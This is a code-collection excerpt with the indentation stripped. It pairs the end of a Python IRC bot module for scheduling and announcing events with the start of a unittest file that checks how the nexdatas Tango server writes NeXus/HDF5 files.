days = int(params[0]) if int(params[0]) < 365 else 365
events = [x for x in self.events[networkName(self.bot, server)] if x["date"] > now() and x[
"date"] <= now() + timedelta(days)]
dayString = "" if days == 1 else "s"
if len(events) > 0:
events.sort(key=lambda item: item["date"])
eventNames = [x["event"] for x in events]
m = "Events occurring in the next {} day{}: {}.".format(days, dayString, ", ".join(eventNames))
else:
m = "No events are occurring in the next {} day{}.".format(days, dayString)
self.replyPRIVMSG(server, source, m)
elif command == "revent":
if len(params) == 0:
self.replyPRIVMSG(server, source, "You didn't specify an event")
return
events = [x for x in self.events[networkName(self.bot, server)] if x["date"] > now()]
events.sort(key=lambda item: item["date"])
for event in events:
if re.search(" ".join(params), event["event"], re.IGNORECASE):
self.events[networkName(self.bot, server)].remove(event)
self.bot.storage["events"] = self.events
m = "{}'s event {!r} with date {} has been removed from the events database.".format(
event["user"], event["event"], strftimeWithTimezone(event["date"]))
self.replyPRIVMSG(server, source, m)
break
else:
events = [x for x in self.events[networkName(self.bot, server)] if x["date"] < now() and x[
"user"].lower() == data["user"].nick.lower()]
events.sort(key=lambda item: item["date"], reverse=True)
for event in events:
if re.search(" ".join(params), event["event"], re.IGNORECASE):
self.events[networkName(self.bot, server)].remove(event)
self.bot.storage["events"] = self.events
m = "{}'s event {!r} with date {} has been removed from the events database.".format(
event["user"], event["event"], strftimeWithTimezone(event["date"]))
self.replyPRIVMSG(server, source, m)
break
else:
m = "No events matching {!r} by you were found in the events database.".format(" ".join(params))
self.replyPRIVMSG(server, source, m)
elif command == "subevent" or command == "unsubevent":
if networkName(self.bot, server) not in self.subscriptions:
self.subscriptions[networkName(self.bot, server)] = []
src = source if "channel" in data else data["user"].nick
subAction = command == "subevent"
self._handleSubscription(server, src, subAction)
def checkEvents(self):
for network in self.subscriptions:
if network not in self.events:
continue
try:
server = [x for x in self.bot.servers.itervalues() if x.supportHelper.network == network][0].name
except IndexError: # We're not currently connected to this network
continue
sources = [x for x in self.subscriptions[network] if x in self.bot.servers[server].channels or x in
self.bot.servers[server].users]
if len(sources) == 0:
continue # Only fire events if there's a channel or user to fire them at
events = []
for i in range(0, len(self.events[network])):
event = self.events[network][i]
if event["date"] < now() and event["fired"] == False:
events.append(event)
self.events[network][i]["fired"] = True
if len(events) == 0:
continue
self.bot.storage["events"] = self.events
for source in sources:
for event in events:
m = "{}'s event {!r} is happening right now!".format(event["user"], event["event"])
self.replyPRIVMSG(server, source, m)
def _handleSubscription(self, server, source, subAction):
if subAction:
if source not in self.subscriptions[networkName(self.bot, server)]:
self.subscriptions[networkName(self.bot, server)].append(source)
self.bot.storage["event-subs"] = self.subscriptions
m = "{} is now subscribed to event announcements.".format(source)
else:
m = "{} is already subscribed to event announcements!".format(source)
else:
if source in self.subscriptions[networkName(self.bot, server)]:
self.subscriptions[networkName(self.bot, server)].remove(source)
self.bot.storage["event-subs"] = self.subscriptions
m = "{} is now unsubscribed from event announcements.".format(source)
else:
m = "{} is not subscribed to event announcements!".format(source)
self.replyPRIVMSG(server, source, m)
eventCommand = EventCommand()
| mit | 7,352,617,542,097,835,000 | 55.125523 | 120 | 0.537424 | false | 4.43145 | false | false | false |
nexdatas/writer | test/NXSDataWriterH5Cpp_test.py | 1 | 207726 | #!/usr/bin/env python
# This file is part of nexdatas - Tango Server for NeXus data writer
#
# Copyright (C) 2012-2017 DESY, Jan Kotanski <[email protected]>
#
# nexdatas is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# nexdatas is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with nexdatas. If not, see <http://www.gnu.org/licenses/>.
# \package test nexdatas
# \file NXSDataWriterH5Cpp_test.py
# unittests for NXSDataWriter
#
import unittest
import os
import sys
import json
import numpy
import PyTango
try:
from ProxyHelper import ProxyHelper
except Exception:
from .ProxyHelper import ProxyHelper
import struct
from nxstools import h5cppwriter as H5CppWriter
try:
import ServerSetUp
except Exception:
from . import ServerSetUp
# if 64-bit machine
IS64BIT = (struct.calcsize("P") == 8)
# test fixture
class NXSDataWriterH5CppTest(unittest.TestCase):
# server counter
serverCounter = 0
# constructor
# \param methodName name of the test method
def __init__(self, methodName):
unittest.TestCase.__init__(self, methodName)
NXSDataWriterH5CppTest.serverCounter += 1
sins = self.__class__.__name__ + \
"%s" % NXSDataWriterH5CppTest.serverCounter
self._sv = ServerSetUp.ServerSetUp("testp09/testtdw/" + sins, sins)
self.__status = {
PyTango.DevState.OFF: "Not Initialized",
PyTango.DevState.ON: "Ready",
PyTango.DevState.OPEN: "File Open",
PyTango.DevState.EXTRACT: "Entry Open",
PyTango.DevState.RUNNING: "Writing ...",
PyTango.DevState.FAULT: "Error",
}
self._scanXmlb = """
<definition>
<group type="NXentry" name="entry%s">
<group type="NXinstrument" name="instrument">
<attribute name ="short_name"> scan instrument </attribute>
<group type="NXdetector" name="detector">
<field units="m" type="NX_FLOAT" name="counter1">
<strategy mode="STEP"/>
<datasource type="CLIENT">
<record name="exp_c01"/>
</datasource>
</field>
<field units="" type="NX_FLOAT" name="mca">
<dimensions rank="1">
<dim value="2048" index="1"/>
</dimensions>
<strategy mode="STEP"/>
<datasource type="CLIENT">
<record name="p09/mca/exp.02"/>
</datasource>
</field>
</group>
</group>
<group type="NXdata" name="data">
<link target="/NXentry/NXinstrument/NXdetector/mca" name="data">
<doc>
Link to mca in /NXentry/NXinstrument/NXdetector
</doc>
</link>
<link target="%s://entry%s/instrument/detector/counter1" name="cnt1">
<doc>
Link to counter1 in /NXentry/NXinstrument/NXdetector
</doc>
</link>
</group>
</group>
</definition>
"""
self._scanXml = """
<definition>
<group type="NXentry" name="entry1">
<group type="NXinstrument" name="instrument">
<attribute name ="short_name"> scan instrument </attribute>
<group type="NXdetector" name="detector">
<field units="m" type="NX_FLOAT" name="counter1">
<strategy mode="STEP"/>
<datasource type="CLIENT">
<record name="exp_c01"/>
</datasource>
</field>
<field units="" type="NX_FLOAT" name="mca">
<dimensions rank="1">
<dim value="2048" index="1"/>
</dimensions>
<strategy mode="STEP"/>
<datasource type="CLIENT">
<record name="p09/mca/exp.02"/>
</datasource>
</field>
</group>
</group>
<group type="NXdata" name="data">
<link target="%s://entry1/instrument/detector/mca" name="data">
<doc>
Link to mca in /NXentry/NXinstrument/NXdetector
</doc>
</link>
<link target="/NXentry/NXinstrument/NXdetector/counter1" name="counter1">
<doc>
Link to counter1 in /NXentry/NXinstrument/NXdetector
</doc>
</link>
</group>
</group>
</definition>
"""
self._scanXml1 = """
<definition>
<group type="NXentry" name="entry1">
<group type="NXinstrument" name="instrument">
<attribute name ="short_name"> scan instrument </attribute>
<group type="NXdetector" name="detector">
<field units="m" type="NX_FLOAT" name="counter1">
<strategy mode="STEP"/>
<datasource type="CLIENT">
<record name="exp_c01"/>
</datasource>
</field>
<field units="" type="NX_FLOAT" name="mca">
<dimensions rank="1">
<dim value="2048" index="1"/>
</dimensions>
<strategy mode="STEP"/>
<datasource type="CLIENT">
<record name="p09/mca/exp.02"/>
</datasource>
</field>
</group>
</group>
<group type="NXdata" name="data">
<link target="/NXentry/NXinstrument/NXdetector/mca" name="data">
<doc>
Link to mca in /NXentry/NXinstrument/NXdetector
</doc>
</link>
<link target="/entry1/instrument/detector/counter1" name="cnt1">
<doc>
Link to counter1 in /NXentry/NXinstrument/NXdetector
</doc>
</link>
</group>
</group>
</definition>
"""
self._scanXml3 = """
<definition>
<group type="NXentry" name="entry1">
<group type="NXinstrument" name="instrument">
<attribute name ="short_name"> scan instrument </attribute>
<group type="NXdetector" name="detector">
<field units="m" type="NX_FLOAT" name="counter1">
<strategy mode="STEP"/>
<datasource type="CLIENT">
<record name="exp_c01"/>
</datasource>
</field>
<field units="" type="NX_INT64" name="image">
<dimensions rank="2">
<dim value="100" index="1"/>
<dim value="200" index="2"/>
</dimensions>
<strategy mode="STEP"/>
<datasource type="CLIENT">
<record name="image"/>
</datasource>
</field>
</group>
</group>
<group type="NXdata" name="data">
<link target="/NXentry/NXinstrument/NXdetector/image" name="data">
<doc>
Link to mca in /NXentry/NXinstrument/NXdetector
</doc>
</link>
<link target="%s://entry1/instrument/detector/counter1" name="cnt1">
<doc>
Link to counter1 in /NXentry/NXinstrument/NXdetector
</doc>
</link>
</group>
</group>
</definition>
"""
self._counter = [0.1, 0.2]
self._mca1 = [e * 0.1 for e in range(2048)]
self._mca2 = [(float(e) / (100. + e)) for e in range(2048)]
self._image1 = [[(i + j) for i in range(100)] for j in range(200)]
self._image2 = [[(i - j) for i in range(100)] for j in range(200)]
self._image1a = [[(i + j) for i in range(200)] for j in range(100)]
self._image2a = [[(i - j) for i in range(200)] for j in range(100)]
self._bint = "int64" if IS64BIT else "int32"
self._buint = "uint64" if IS64BIT else "uint32"
self._bfloat = "float64" if IS64BIT else "float32"
# test starter
# \brief Common set up of Tango Server
def setUp(self):
self._sv.setUp()
# test closer
    # \brief Common tear down of Tango Server
def tearDown(self):
self._sv.tearDown()
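    # sets a device property in the Tango database and re-initialises the server
    # \param rc device proxy
    # \param name property name
    # \param value property value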
def setProp(self, rc, name, value):
db = PyTango.Database()
name = "" + name[0].upper() + name[1:]
db.put_device_property(
self._sv.new_device_info_writer.name,
{name: value})
rc.Init()
# Exception tester
# \param exception expected exception
# \param method called method
# \param args list with method arguments
# \param kwargs dictionary with method arguments
def myAssertRaise(self, exception, method, *args, **kwargs):
try:
error = False
method(*args, **kwargs)
except Exception:
error = True
self.assertEqual(error, True)
# openFile test
# \brief It tests validation of opening and closing H5 files.
def test_openFile(self):
fun = sys._getframe().f_code.co_name
print("Run: %s.%s() " % (self.__class__.__name__, fun))
try:
fname = '%s/test.h5' % os.getcwd()
dp = PyTango.DeviceProxy(self._sv.device)
self.assertTrue(ProxyHelper.wait(dp, 10000))
# print 'attributes', dp.attribute_list_query()
self.assertEqual(dp.state(), PyTango.DevState.ON)
self.assertEqual(dp.status(), self.__status[dp.state()])
self.setProp(dp, "writer", "h5cpp")
dp.FileName = fname
dp.OpenFile()
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
self.assertEqual(dp.XMLSettings, "")
self.assertEqual(dp.JSONRecord, "{}")
dp.CloseFile()
self.assertEqual(dp.state(), PyTango.DevState.ON)
self.assertEqual(dp.status(), self.__status[dp.state()])
# check the created file
f = H5CppWriter.open_file(fname, readonly=True)
# self.assertEqual(f.name, fname)
f = f.root()
# self.assertEqual(f.path, fname)
# print("\nFile attributes:")
cnt = 0
for at in f.attributes:
cnt += 1
# print(at.name),"=",at[...]
self.assertEqual(cnt, len(f.attributes))
self.assertEqual(5, len(f.attributes))
# print ""
self.assertEqual(f.attributes["file_name"][...], fname)
self.assertTrue(f.attributes["NX_class"][...], "NXroot")
self.assertEqual(f.size, 1)
cnt = 0
for ch in f:
cnt += 1
self.assertEqual(cnt, f.size)
f.close()
finally:
if os.path.isfile(fname):
os.remove(fname)
# openFile test
# \brief It tests validation of opening and closing H5 files.
def test_openFileDir(self):
fun = sys._getframe().f_code.co_name
print("Run: %s.%s() " % (self.__class__.__name__, fun))
directory = '#nexdatas_test_directory#'
dirCreated = False
dirExists = False
if not os.path.exists(directory):
try:
os.makedirs(directory)
dirCreated = True
dirExists = True
except Exception:
pass
else:
dirExists = True
if dirExists:
fname = '%s/%s/%s%s.h5' % (
os.getcwd(), directory, self.__class__.__name__, fun)
else:
fname = '%s/%s%s.h5' % (os.getcwd(), self.__class__.__name__, fun)
        try:
dp = PyTango.DeviceProxy(self._sv.device)
self.assertTrue(ProxyHelper.wait(dp, 10000))
# print 'attributes', dp.attribute_list_query()
self.assertEqual(dp.state(), PyTango.DevState.ON)
self.assertEqual(dp.status(), self.__status[dp.state()])
self.setProp(dp, "writer", "h5cpp")
dp.FileName = fname
dp.OpenFile()
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
self.assertEqual(dp.XMLSettings, "")
self.assertEqual(dp.JSONRecord, "{}")
dp.CloseFile()
self.assertEqual(dp.state(), PyTango.DevState.ON)
self.assertEqual(dp.status(), self.__status[dp.state()])
# check the created file
f = H5CppWriter.open_file(fname, readonly=True)
f = f.root()
# self.assertEqual(f.name, fname)
# self.assertEqual(f.path, fname)
# print("\nFile attributes:")
cnt = 0
for at in f.attributes:
cnt += 1
# print(at.name),"=",at[...]
self.assertEqual(cnt, len(f.attributes))
self.assertEqual(5, len(f.attributes))
# print ""
self.assertEqual(f.attributes["file_name"][...], fname)
self.assertTrue(f.attributes["NX_class"][...], "NXroot")
self.assertEqual(f.size, 1)
cnt = 0
for ch in f:
cnt += 1
self.assertEqual(cnt, f.size)
f.close()
finally:
if os.path.isfile(fname):
os.remove(fname)
if dirCreated:
os.removedirs(directory)
# openEntry test
# \brief It tests validation of opening and closing entry in H5 files.
def test_openEntry(self):
fun = sys._getframe().f_code.co_name
print("Run: %s.%s() " % (self.__class__.__name__, fun))
fname = '%s/test2.h5' % os.getcwd()
xml = '<definition> <group type="NXentry" name="entry"/></definition>'
try:
dp = PyTango.DeviceProxy(self._sv.device)
self.assertTrue(ProxyHelper.wait(dp, 10000))
# print 'attributes', dp.attribute_list_query()
self.setProp(dp, "writer", "h5cpp")
dp.FileName = fname
self.assertEqual(dp.state(), PyTango.DevState.ON)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.OpenFile()
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.XMLSettings = xml
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.OpenEntry()
self.assertEqual(dp.status(), self.__status[dp.state()])
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
dp.CloseEntry()
self.assertEqual(dp.status(), self.__status[dp.state()])
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
dp.CloseFile()
self.assertEqual(dp.status(), self.__status[dp.state()])
self.assertEqual(dp.state(), PyTango.DevState.ON)
# check the created file
f = H5CppWriter.open_file(fname, readonly=True)
f = f.root()
# self.assertEqual(f.path, fname)
cnt = 0
for at in f.attributes:
cnt += 1
self.assertEqual(cnt, len(f.attributes))
self.assertEqual(f.attributes["file_name"][...], fname)
self.assertTrue(f.attributes["NX_class"][...], "NXroot")
self.assertEqual(f.size, 2)
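            # the root group holds the created entry and the nexus_logs collection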
cnt = 0
for ch in f:
self.assertTrue(ch.is_valid)
cnt += 1
if ch.name == "entry":
self.assertEqual(ch.name, "entry")
self.assertEqual(len(ch.attributes), 1)
for at in ch.attributes:
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
# self.assertEqual(at.dtype,"string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXentry")
else:
self.assertEqual(ch.name, "nexus_logs")
ch2 = ch.open("configuration")
for c in ch2:
if c.name == "nexus__entry__1_xml":
self.assertEqual(
c.read(),
'<definition> '
'<group type="NXentry" name="entry"/>'
'</definition>')
print(c.read())
else:
self.assertEqual(c.name, "python_version")
self.assertEqual(c.read(), sys.version)
self.assertEqual(len(ch.attributes), 1)
for at in ch.attributes:
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
# self.assertEqual(at.dtype,"string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXcollection")
self.assertEqual(cnt, f.size)
f.close()
finally:
if os.path.isfile(fname):
os.remove(fname)
# openEntryWithSAXParseException test
# \brief It tests validation of opening and closing entry
# with SAXParseException
def test_openEntryWithSAXParseException(self):
fun = sys._getframe().f_code.co_name
print("Run: %s.%s() " % (self.__class__.__name__, fun))
fname = '%s/test2.h5' % os.getcwd()
wrongXml = """Ala ma kota."""
xml = """<definition/>"""
try:
dp = PyTango.DeviceProxy(self._sv.device)
self.assertTrue(ProxyHelper.wait(dp, 10000))
# print 'attributes', dp.attribute_list_query()
self.setProp(dp, "writer", "h5cpp")
dp.FileName = fname
self.assertEqual(dp.state(), PyTango.DevState.ON)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.OpenFile()
try:
error = None
dp.XMLSettings = wrongXml
except PyTango.DevFailed:
error = True
except Exception:
error = False
self.assertEqual(error, True)
self.assertTrue(error is not None)
self.assertEqual(dp.status(), self.__status[dp.state()])
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
# dp.CloseFile()
# dp.OpenFile()
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.XMLSettings = xml
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.OpenEntry()
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.CloseEntry()
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.CloseFile()
self.assertEqual(dp.state(), PyTango.DevState.ON)
self.assertEqual(dp.status(), self.__status[dp.state()])
# check the created file
f = H5CppWriter.open_file(fname, readonly=True)
f = f.root()
# self.assertEqual(f.path, fname)
cnt = 0
for at in f.attributes:
cnt += 1
self.assertEqual(cnt, len(f.attributes))
self.assertEqual(f.attributes["file_name"][...], fname)
self.assertTrue(f.attributes["NX_class"][...], "NXroot")
self.assertEqual(f.size, 1)
cnt = 0
for ch in f:
cnt += 1
self.assertEqual(cnt, f.size)
f.close()
finally:
if os.path.isfile(fname):
os.remove(fname)
# scanRecord test
# \brief It tests recording of simple h5 file
def test_scanRecord_twoentries(self):
fun = sys._getframe().f_code.co_name
print("Run: %s.%s() " % (self.__class__.__name__, fun))
fname = '%s/scantest2.h5' % os.getcwd()
try:
dp = PyTango.DeviceProxy(self._sv.device)
self.assertTrue(ProxyHelper.wait(dp, 10000))
# print 'attributes', dp.attribute_list_query()
self.setProp(dp, "writer", "h5cpp")
dp.FileName = fname
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.state(), PyTango.DevState.ON)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.OpenFile()
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.XMLSettings = self._scanXmlb % ("001", fname, "001")
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
dp.OpenEntry()
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.Record('{"data": {"exp_c01":' + str(self._counter[0]) +
', "p09/mca/exp.02":' +
str(self._mca1) + ' } }')
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.Record('{"data": {"exp_c01":' + str(self._counter[1]) +
', "p09/mca/exp.02":' +
str(self._mca2) + ' } }')
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.CloseEntry()
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.XMLSettings = self._scanXmlb % ("002", fname, "002")
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
dp.OpenEntry()
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.Record('{"data": {"exp_c01":' + str(self._counter[0]) +
', "p09/mca/exp.02":' +
str(self._mca1) + ' } }')
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.Record('{"data": {"exp_c01":' + str(self._counter[1]) +
', "p09/mca/exp.02":' +
str(self._mca2) + ' } }')
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.CloseEntry()
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.CloseFile()
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.state(), PyTango.DevState.ON)
self.assertEqual(dp.status(), self.__status[dp.state()])
# check the created file
from nxstools import filewriter as FileWriter
FileWriter.writer = H5CppWriter
f = FileWriter.open_file(fname, readonly=True)
f = f.root()
self.assertEqual(5, len(f.attributes))
self.assertEqual(f.attributes["file_name"][...], fname)
self.assertTrue(f.attributes["NX_class"][...], "NXroot")
self.assertEqual(f.size, 3)
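            # both written entries should contain the same structure and data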
ent = ["001", "002"]
for et in ent:
en = f.open("entry%s" % et)
self.assertTrue(en.is_valid)
self.assertEqual(en.name, "entry%s" % et)
self.assertEqual(len(en.attributes), 1)
self.assertEqual(en.size, 2)
at = en.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXentry")
# ins = f.open("entry1/instrument:NXinstrument") #bad exception
# ins = f.open("entry1/instrument")
ins = en.open("instrument")
self.assertTrue(ins.is_valid)
self.assertEqual(ins.name, "instrument")
self.assertEqual(len(ins.attributes), 2)
self.assertEqual(ins.size, 1)
at = ins.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXinstrument")
at = ins.attributes["short_name"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "short_name")
self.assertEqual(at[...], "scan instrument")
det = ins.open("detector")
self.assertTrue(det.is_valid)
self.assertEqual(det.name, "detector")
self.assertEqual(len(det.attributes), 1)
self.assertEqual(det.size, 2)
at = det.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXdetector")
# cnt = det.open("counter") # bad exception
cnt = det.open("counter1")
self.assertTrue(cnt.is_valid)
self.assertEqual(cnt.name, "counter1")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(cnt.shape), 1)
self.assertEqual(cnt.shape, (2,))
self.assertEqual(cnt.dtype, "float64")
self.assertEqual(cnt.size, 2)
value = cnt.read()
# value = cnt[:]
for i in range(len(value)):
self.assertEqual(self._counter[i], value[i])
self.assertEqual(len(cnt.attributes), 4)
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = cnt.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = cnt.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "m")
at = cnt.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
mca = det.open("mca")
self.assertTrue(mca.is_valid)
self.assertEqual(mca.name, "mca")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(mca.shape), 2)
self.assertEqual(mca.shape, (2, 2048))
self.assertEqual(mca.dtype, "float64")
self.assertEqual(mca.size, 4096)
value = mca.read()
for i in range(len(value[0])):
self.assertEqual(self._mca1[i], value[0][i])
for i in range(len(value[0])):
self.assertEqual(self._mca2[i], value[1][i])
self.assertEqual(len(mca.attributes), 4)
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = mca.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = mca.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "")
at = mca.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
dt = en.open("data")
self.assertTrue(dt.is_valid)
self.assertEqual(dt.name, "data")
self.assertEqual(len(dt.attributes), 1)
self.assertEqual(dt.size, 2)
at = dt.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXdata")
cnt = dt.open("cnt1")
self.assertTrue(cnt.is_valid)
                # the reported name of the linked dataset depends on the writer
                # (link name "cnt1" vs target name "counter1"), so it is not checked
                # self.assertEqual(cnt.name, "cnt1")
                # self.assertEqual(cnt.name, "counter1")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(cnt.shape), 1)
self.assertEqual(cnt.shape, (2,))
self.assertEqual(cnt.dtype, "float64")
self.assertEqual(cnt.size, 2)
# print(cnt.read())
value = cnt[:]
for i in range(len(value)):
self.assertEqual(self._counter[i], value[i])
self.assertEqual(len(cnt.attributes), 4)
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = cnt.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = cnt.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "m")
at = cnt.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
mca = dt.open("data")
self.assertTrue(mca.is_valid)
self.assertEqual(mca.name, "data")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(mca.shape), 2)
self.assertEqual(mca.shape, (2, 2048))
self.assertEqual(mca.dtype, "float64")
self.assertEqual(mca.size, 4096)
value = mca.read()
for i in range(len(value[0])):
self.assertEqual(self._mca1[i], value[0][i])
for i in range(len(value[0])):
self.assertEqual(self._mca2[i], value[1][i])
self.assertEqual(len(mca.attributes), 4)
